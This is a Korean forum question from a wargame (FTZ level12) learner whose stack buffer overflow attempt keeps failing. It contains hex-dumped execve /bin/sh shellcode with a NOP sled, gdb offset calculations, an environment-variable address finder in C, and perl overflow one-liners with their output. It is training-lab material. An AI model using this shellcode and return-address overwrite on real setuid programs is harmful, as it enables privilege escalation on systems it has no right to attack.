|
http://www.hackerschool.org/HS_Boards/view.php?id=QNA_level&no=3250 [복사]
어디를 잘못한건지 모르겠어요 ㅠㅠ. 며칠 째야....
[level12@ftz tmp]$ echo -n $SHELLCODE | hexdump -C ;# SHELLCODE라는 환경변수에 NOP sled를 포함해 쉘코드를 넣었습니다.
00000000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
000000c0 90 90 90 90 90 90 90 90 eb 1f 5e 89 76 08 31 c0 |..........^.v.1.|
000000d0 88 46 07 89 46 0c b0 0b 89 f3 8d 4e 08 8d 56 0c |.F..F......N..V.|
000000e0 cd 80 31 db 89 d8 40 cd 80 e8 dc ff ff ff 2f 62 |..1...@......./b|
000000f0 69 6e 2f 73 68 |in/sh|
000000f5
[level12@ftz tmp]$ gdb /home/level12/attackme ;# 절대경로로 gdb실행. 여기선 딱히 절대경로가 의미가 없을지도...
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
(gdb) disass main
Dump of assembler code for function main:
0x08048470 <main+0>: push %ebp
0x08048471 <main+1>: mov %esp,%ebp
0x08048473 <main+3>: sub $0x108,%esp
0x08048479 <main+9>: sub $0x8,%esp
0x0804847c <main+12>: push $0xc15
0x08048481 <main+17>: push $0xc15
0x08048486 <main+22>: call 0x804835c <setreuid>
0x0804848b <main+27>: add $0x10,%esp
0x0804848e <main+30>: sub $0xc,%esp
0x08048491 <main+33>: push $0x8048538
0x08048496 <main+38>: call 0x804834c <printf>
0x0804849b <main+43>: add $0x10,%esp
0x0804849e <main+46>: sub $0xc,%esp
0x080484a1 <main+49>: lea 0xfffffef8(%ebp),%eax
0x080484a7 <main+55>: push %eax
0x080484a8 <main+56>: call 0x804831c <gets>
0x080484ad <main+61>: add $0x10,%esp
0x080484b0 <main+64>: sub $0x8,%esp
0x080484b3 <main+67>: lea 0xfffffef8(%ebp),%eax
0x080484b9 <main+73>: push %eax
0x080484ba <main+74>: push $0x804854c
0x080484bf <main+79>: call 0x804834c <printf>
0x080484c4 <main+84>: add $0x10,%esp
0x080484c7 <main+87>: leave
0x080484c8 <main+88>: ret
0x080484c9 <main+89>: lea 0x0(%esi),%esi
0x080484cc <main+92>: nop
0x080484cd <main+93>: nop
0x080484ce <main+94>: nop
0x080484cf <main+95>: nop
End of assembler dump.
(gdb) b main
Breakpoint 1 at 0x8048479
(gdb) b *main+61
Breakpoint 2 at 0x80484ad
(gdb) run
Starting program: /home/level12/attackme
Breakpoint 1, 0x08048479 in main ()
(gdb) i r eip
eip 0x8048479 0x8048479
(gdb) x/20x $esp+0x108
0xbffffa28: 0xbffffa48 0x40033917 0x00000001 0xbffffa74
0xbffffa38: 0xbffffa7c 0x4001582c 0x00000001 0x08048370
0xbffffa48: 0x00000000 0x08048391 0x08048470 0x00000001
0xbffffa58: 0xbffffa74 0x080482e4 0x08048510 0x4000c660
0xbffffa68: 0xbffffa6c 0x00000000 0x00000001 0xbffffb5d
(gdb) p 0xbffffa32 ;# 잘못 계산한 겁니다;;
$1 = 3221223986
(gdb) p 0xbffffa28 + 4
$2 = 3221223980 ;# 이게 main의 ret값.
(gdb) c
Continuing.
문장을 입력하세요.
abcdefghijklmn
Breakpoint 2, 0x080484ad in main ()
(gdb) x/40x $esp
0xbffff910: 0xbffff920 0x00000c15 0xbffff940 0x00000001
0xbffff920: 0x64636261 0x68676665 0x6c6b6a69 0x07006e6d
0xbffff930: 0xbffff9d0 0x40015a38 0x0029656e 0x00000000
0xbffff940: 0x400299c8 0x400160a8 0x00000000 0x00000000
0xbffff950: 0x00000000 0x00000000 0x00000000 0x4000807f
0xbffff960: 0x4001582c 0x00002005 0xbffff990 0xbffff9bc
0xbffff970: 0x4000be03 0x40016244 0x00000000 0x0177ff8e
0xbffff980: 0x4000807f 0x4001582c 0x00000059 0x40015a38
0xbffff990: 0xbffff9e0 0x4000be03 0x40015bd4 0x40016370
0xbffff9a0: 0x00000001 0x00000000 0x4002bdbd 0x40024a88
(gdb) p 0xbffff920
$3 = 3221223712 ;# 이게 str배열 시작 주소값
(gdb) p $2 - $3 ;# 둘의 차를 구하면
$4 = 268 ;# 268바이트가 나오네요.
(gdb) p $4 / 4
$5 = 67 ;# 4바이트씩 주소 값을 쓸 거니까 4로 나눴습니다. 여기다 +1을 할 겁니다.
(gdb) q
The program is running. Exit anyway? (y or n) y
[level12@ftz tmp]$ ./g SHELLCODE /home/level12/attackme ;# 참고로 실행파일 절대경로로 써도 같은 값이 나왔습니다..
SHELLCODE의 대충 어림잡은 메모리주소는 0xbffffb87예염..
[level12@ftz tmp]$ cat ./g.c ;# 소스코드도 보여드릴게요..
int main(int argc, char *argv[])
{
char* ptr;
if (argc < 3) { perror("getenvaddr [환경변수 이름] [대상 프로그램]"); exit(1); }
ptr = (char*)getenv(argv[1]);
if ( !ptr ) { perror("환경변수 이름이 틀렸나봐요. ㅠㅠ"); exit(2); }
ptr += (strlen(argv[0]) - strlen(argv[2]))*2;
printf("%s의 대충 어림잡은 메모리주소는 %p예염..\n", argv[1], ptr);
return 0;
}
[level12@ftz tmp]$ perl -e 'print "\xc7\xfb\xff\xbf"x68'|/home/level12/attackme ;# NOP sled도 있으니까 환경변수 주소 구한 값에 넉넉잡아 +64해봤습니다.
문장을 입력하세요.
혔�옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?�옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳?옳??
[level12@ftz tmp]$ perl -e 'print "\xc7\xfb\xff\xaf"x68'|/home/level12/attackme
문장을 입력하세요.
혔�????????????????????????????????????????????????????????????????????????????????????????????????????????�???????????????????????????????
세그멘테이션 오류
[level12@ftz tmp]$ perl -e 'print "\xc7\xfb\xff\xaf"x67'|/home/level12/attackme ;# 여기에서 세그먼테이션 오류가 뜨는 건 SFP때문일까요?
문장을 입력하세요.
혔�????????????????????????????????????????????????????????????????????????????????????????????????????????�?????????????????????????????
세그멘테이션 오류
[level12@ftz tmp]$ perl -e 'print "\xc7\xfb\xff\xaf"x66'|/home/level12/attackme
문장을 입력하세요.
혔�????????????????????????????????????????????????????????????????????????????????????????????????????????�???????????????????????????
[level12@ftz tmp]$ perl -e 'print "\xe7\xfb\xff\xbf"x68'|/home/level12/attackme ;# 발버둥입니다 ㅠㅠ
문장을 입력하세요.
晤�욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?�욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜?욜??
[level12@ftz tmp]$
어디가 틀린 거지요.. 친절한 답변 부탁드립니다! 절대경로를 써도 해결되지가 않아요! |
Hit : 4886 Date : 2012/01/14 09:23
|